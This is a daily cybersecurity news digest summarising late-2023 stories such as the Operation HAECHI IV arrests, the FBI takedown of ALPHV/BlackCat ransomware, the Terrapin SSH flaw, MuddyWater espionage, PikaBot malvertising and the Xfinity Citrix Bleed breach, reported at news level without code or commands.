Daily Brief

An international law enforcement collaboration, "Operation HAECHI IV," has resulted in the arrest of 3,500 suspects linked to cybercrimes and the seizure of $300 million in criminal proceeds. The operation was conducted between July and December 2023, with South Korean authorities spearheading it alongside agencies from 34 other countries, including the US, UK, Japan, Hong Kong, and India. Targeted crimes included voice phishing, romance scams, sextortion, investment fraud, illegal online gambling, business email compromise, and e-commerce fraud, among others. Interpol's I-GRIP system helped identify and freeze over 82,000 bank accounts associated with these cybercrimes across the participating nations. Seized assets comprised traditional currency and digital assets like NFTs, with a notable arrest of an elusive online gambling criminal in Manila. The latest cyber fraud trends observed from the operation involved digital investment fraud and NFT platform "rug pulls," as well as the use of AI and deep fake technologies for impersonation and scams. Operation HAECHI IV marks a significant increase in success compared to the previous "HAECHI III" operation, with over 260% more arrests and a significant increase in seized funds.

The FBI successfully seized the servers of the BlackCat (ALPHV) ransomware gang, assisted by a confidential human source. Backed by a federal search warrant, the FBI infiltrated the ransomware backend, obtaining crucial information on their operations. The agency accessed decryption keys and created a tool that has helped more than 400 victims recover their data free of charge. Details on exactly how the decryption keys were obtained are not provided, leading to speculation about possible FBI exploitation of system vulnerabilities. The FBI collected 946 key pairs relating to the gang's Tor-based communication, leak sites, and management panels, giving them control over these URLs. This is the third successful operation against ransomware groups by the FBI, hinting at an effective tactic now in use against cybercriminal infrastructure. The ALPHV/BlackCat ransomware group is expected to potentially shut down and rebrand following this significant law enforcement disruption.

Academic researchers have identified the Terrapin attack, which degrades the integrity of SSH channels by meddling with sequence numbers during the handshake. The attack affects widely used encryption modes in OpenSSH, allowing attackers to alter or remove messages in the communication channel. The vulnerability can lead to downgraded public key algorithms and weakened defenses against keystroke timing attacks in OpenSSH 9.5. Designated CVE-2023-48795, CVE-2023-46445, and CVE-2023-46446, these flaws require attackers to be in a position to intercept network communications and are specifically related to ChaCha20-Poly1305 and CBC with Encrypt-then-MAC encryption modes. Researchers observed a 77% adoption of the vulnerable encryption modes, implying a significant real-world impact of the Terrapin attack. Remediation includes implementing a strict key exchange; however, it must be adopted by both clients and servers to be fully effective. A vulnerability scanner for the Terrapin attack has been published on GitHub, enabling administrators to assess susceptibility to this threat. Despite the risks, the necessity for attackers to achieve a MitM position reduces the overall threat severity, leading some to deprioritize patches for CVE-2023-48795.

U.S. Justice Department announces disruption of BlackCat ransomware operations. A free decryption tool released for victims to recover files encrypted by BlackCat malware. The FBI infiltrated the gang through a confidential human source posing as an affiliate. BlackCat, known for being the first Rust-language ransomware, emerged as a major threat since December 2021. The disruption prevented ransom demands totaling approximately $68 million and provided insights into the ransomware's network. Over 946 key pairs used in the ransomware's TOR sites were collected, aiding in their dismantlement. BlackCat utilized a ransomware-as-a-service business model and engaged in double extortion tactics. The cybercrime group is responsible for invading over 1,000 networks worldwide, amassing substantial illegal profits.

Cybersecurity researchers from PRODAFT have detailed the operations of a ransomware empire led by Russian national Mikhail Pavlovich Matveev. Matveev, known by multiple aliases including Wazawaka, is linked to the LockBit, Babuk, and Hive ransomware strains. He has been indicted by the U.S. for initiating thousands of ransomware attacks worldwide, often employing aggressive tactics, including threats and dishonesty. Matveev worked with a team of six and had affiliations with various notorious cybercrime groups, including a management role in the Babuk group. The team used sophisticated methods to breach networks, including information gathering through Zoominfo and exploiting known vulnerabilities, with a preference for MeshCentral as their Remote Monitoring and Management tool. The investigation has revealed Matveev's connections to Evgeniy Mikhailovich Bogachev, linked to the GameOver Zeus botnet and Evil Corp. Matveev and his team exhibited a lack of ethical practices, frequently refusing to release files even after victims complied with ransom demands.

The US Justice Department has provided a decryptor to over 500 victims of the AlphV/BlackCat ransomware, potentially preventing $68 million in ransom payments. US Attorney Markenzy Lapointe, with support from FBI Miami, the US Secret Service, and international partners, highlighted the effort against sophisticated cybercriminals. Following a collaborative operation with the UK, Australia, and Europol, AlphV/BlackCat's old leak site was seized and defaced with an FBI notice. The disruption action has resulted in the ransomware group shifting their servers and leak blog; their resilience and operational status remain uncertain. Despite the takedown, AlphV's most recent victim list remains active, leading to questions about the full impact of the law enforcement's disruption campaign. The historical downtime and seizure of AlphV's platforms combined with the availability of the decryptor could signify the end for AlphV under its current name, although experts believe the group may rebrand and resurface. A National Crime Agency spokesperson emphasized the threat of ransomware and the importance of reporting and protecting against such attacks, pointing to NCSC.gov.uk for advice.

The FBI infiltrated the servers of the ALPHV, also known as BlackCat, ransomware operation to monitor its activities. During the operation, the FBI collected decryption keys and provided them to over 500 victims to prevent ransom payments. An official decryption tool has been created by the FBI to assist other impacted parties in file recovery without cost. ALPHV's infrastructure compromise by law enforcement has reduced trust among the ransomware's affiliates. Following the disruption, some affiliates resorted to direct email communication with victims, avoiding the gang's infrastructure. Rival ransomware operation LockBit has attempted to recruit affected affiliates of ALPHV. Over the years, this ransomware operation has been breached multiple times by law enforcement under various names such as DarkSide and BlackMatter. The repeated disruption by law enforcement may prompt the ransomware gang to rebrand once again under a new identity.

Threat actors are using GitHub to host malware and control compromised systems. GitHub secret Gists and git commit messages are being abused to issue malicious commands. Malicious network traffic is disguised as legitimate, complicating detection by standard security tools. Public services are being misused as dead drop resolvers for command-and-control server addresses. Secret Gists are not listed on the author's profile, making them an attractive tool for hackers. Identified malicious PyPI packages relied on encoded URLs in secret gists for delivering commands. Commit messages within git repositories also used for command execution, demonstrating advanced tactics. Fraudulent packages using these techniques have been removed from the Python Package Index (PyPI).

Employee security awareness training is a common budget item for organizations but is often questioned for its effectiveness, as employees continue to exhibit insecure behaviors. Phishing and social engineering attacks are prevalent, leading to data breaches, yet video-based training only slightly reduces such risks, indicating a need for improved training methods. Organizations prioritize security training, placing it just behind incident response planning, seeing it as an important defense against cyberattacks despite the challenges of measuring its effectiveness. Employees desire engaging and interactive training sessions and request allocated time within their work schedules to accommodate security education. Cybersecuritoons, a new cybersecurity course by Moonlock, offers quick and accessible animated lessons to accommodate the limited time and attention spans of modern workers. Statistics reveal that proper security training can significantly reduce data breach costs, emphasizing the importance of ongoing awareness programs. A culture of feedback and engagement around security practices is encouraged, allowing customization of training content and fostering a security-conscious workforce. Organizations like MacPaw recognize the value in dedicating specific times for employees to focus on security training, suggesting a growing recognition of the importance of cybersecurity knowledge in the workplace.

Iranian group MuddyWater, linked to Iran's Ministry of Intelligence, has been using a new C2 framework, MuddyC2Go, for cyber espionage, particularly targeting African telecom sectors. Broad security expert teams, like Symantec's Threat Hunter Team, are closely monitoring the group's activity, known by various aliases, including Seedworm and TEMP.Zagros. MuddyC2Go, which may have been in use as early as 2020, allows for remote access to compromised systems via an embedded PowerShell script connecting to the group's servers. Recent attacks in November 2023 employed MuddyC2Go alongside other tools, such as custom keyloggers, Venom Proxy, and legitimate remote access software, for initial infiltration and persistence in victim networks. MuddyWater's campaign includes phishing, exploitation of unpatched systems, reconnaissance, lateral movement, and data exfiltration, all while trying to remain undetected by blending with legitimate tools and operations. The group continues to evolve their toolset and tactics, emphasizing that organizations need to monitor and secure against suspicious use of PowerShell. The article also refers to retaliatory cyber activity by an Israeli-linked group, Gonjeshke Darande, targeting Iranian infrastructure in response to regional aggression.

A new malvertising campaign is distributing malware, including PikaBot, disguised as legitimate software such as AnyDesk. PikaBot, emerging in 2023, is known for enabling threat actors to execute commands and further distribute malware payloads, such as Cobalt Strike, from remote servers. Cybersecurity researchers have identified that the malware is propagated via a malicious Google ad that directs users to a counterfeit website delivering the malware. Threat actors are using sophisticated techniques to bypass security measures, including fingerprinting to filter out virtual machines and leveraging legitimate marketing platforms for redirection. Malicious ads have also been found targeting other popular software searches, suggesting a systemic malvertising effort to compromise network security. Trend Micro revealed a new rogue Chrome extension, ParaSiteSnatcher, specifically targeting Latin American users, which intercepts sensitive financial information using extensive permissions. The continuous rise of malvertising and browser-based attacks highlights the need for enhanced security practices like Zero Trust to secure data.

Xfinity disclosed a massive data breach involving an attacker exploiting a critical vulnerability in Citrix systems, known as Citrix Bleed (CVE-2023-4966). Detected between October 16-19, following a Citrix update on October 25, the breach resulted in the exfiltration of personal data for more than 35 million customers. Compromised information may include usernames, hashed passwords, partial social security numbers, contact details, dates of birth, and security question answers. Xfinity had customers reset passwords and notified affected parties, though confusion arose when users received reset prompts without an initial explanation. In a previous incident one year ago, Xfinity accounts were hacked, leading to additional breaches on platforms such as Coinbase and Gemini. Comcast insists that the breach did not affect its operations and claims that no customer data has been leaked nor any ransom demanded following the incident. The company reinforces the importance of using two-factor or multi-factor authentication as an additional security measure.

Qakbot malware has resurged just months after a major law enforcement takedown dubbed Operation Duck Hunt. Microsoft Threat Intelligence reports a new low-volume Qakbot phishing campaign targeting the hospitality sector with malicious PDFs. The recent campaign uses a PDF template similar to the one used by Pikabot malware, both associated with group TA577. An updated Qakbot version features 64-bit architecture, AES network encryption, and has new communication patterns. Despite the operation's initial success in seizing Qakbot's infrastructure and operators' crypto wallets, no arrests were made, challenging long-term efficacy. Cybersecurity experts caution that without making arrests, malware networks like Qakbot are likely to adapt and resurface, stressing the need for organizations to maintain strong cybersecurity practices. Comparisons are drawn to Emotet's resurgence post-law enforcement crackdown, suggesting a potential pattern for Qakbot's continued activity.

The 8220 Gang has been exploiting a vulnerability in Oracle WebLogic Server, identified as CVE-2020-14883, to spread malware. This remote code execution vulnerability permits attackers with credentials to take control of affected servers. Attackers use compromised credentials or exploit another vulnerability, CVE-2020-14882, to bypass authentication on Oracle WebLogic Server. The gang has a track record of using security flaws for cryptojacking operations, including a previous Oracle WebLogic Server vulnerability from May. Recent attacks use crafted XML files to execute code that deploys stealer and mining malware, such as Agent Tesla, rhajk, and nasqa. Industries targeted by these attacks include healthcare, telecommunications, and financial services in various countries, including the U.S. and Mexico. Despite their relatively unsophisticated methods, the 8220 Gang is adapting their techniques to skirt detection.

Approximately 300 organizations worldwide have been impacted by the Play ransomware according to a joint advisory from Australia and the U.S. Play ransomware, also known as Balloonfly or PlayCrypt, exploits vulnerabilities in Microsoft Exchange servers and Fortinet appliances to deploy malware. Ransomware attacks are shifting from phishing to exploiting vulnerabilities, with a significant increase noted in the first half of 2023. Adlumin's report suggests that Play has evolved into a ransomware-as-a-service (RaaS) operation, indicating a growing trend in the cybercriminal ecosystem. The Play ransomware group specializes in the double-extortion tactic, encouraging victims to contact them via email for ransom negotiations. U.S. government agencies also shed light on groups like Karakurt, which focus on extortion without encryption, and the temporary offline status of BlackCat ransomware's portals due to speculated law enforcement activity or hardware issues. Collaborations among ransomware groups, such as the joint campaign between BianLian, White Rabbit, and Mario, are becoming more common and are influenced by the roles of initial access brokers and the dispersal of cybercriminal networks following law enforcement actions.